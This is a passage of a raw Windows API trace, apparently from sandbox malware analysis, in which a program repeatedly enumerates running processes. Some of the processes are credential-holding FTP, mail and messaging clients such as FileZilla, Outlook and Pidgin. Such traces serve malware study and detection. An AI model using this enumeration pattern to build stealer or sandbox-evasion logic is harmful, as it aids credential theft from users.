hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0244.740] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0244.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0244.744] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0244.746] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.750] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.752] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.754] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0244.756] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0244.758] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0244.759] CloseHandle (hObject=0x17b0) returned 1 [0244.760] Sleep (dwMilliseconds=0x64) [0244.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0244.901] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.907] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0244.908] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0244.910] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.911] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0244.913] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0244.914] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0244.915] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0244.917] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0244.919] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.930] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0244.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.937] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.939] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.940] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.942] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.943] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.945] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.947] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.948] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0245.019] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0245.021] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.022] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0245.026] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0245.027] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0245.032] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.034] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.035] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0245.037] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.038] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.040] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0245.041] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0245.042] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0245.047] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0245.049] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0245.050] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0245.052] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0245.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0245.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0245.056] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0245.057] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0245.070] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0245.071] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0245.073] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0245.080] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0245.082] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0245.084] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0245.085] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0245.087] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0245.088] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0245.090] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0245.094] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0245.096] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0245.097] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0245.099] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0245.100] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0245.102] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0245.104] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0245.110] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0245.112] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0245.114] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0245.117] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0245.119] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0245.174] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0245.176] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0245.178] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0245.180] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0245.182] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0245.184] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0245.188] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0245.190] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0245.192] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, 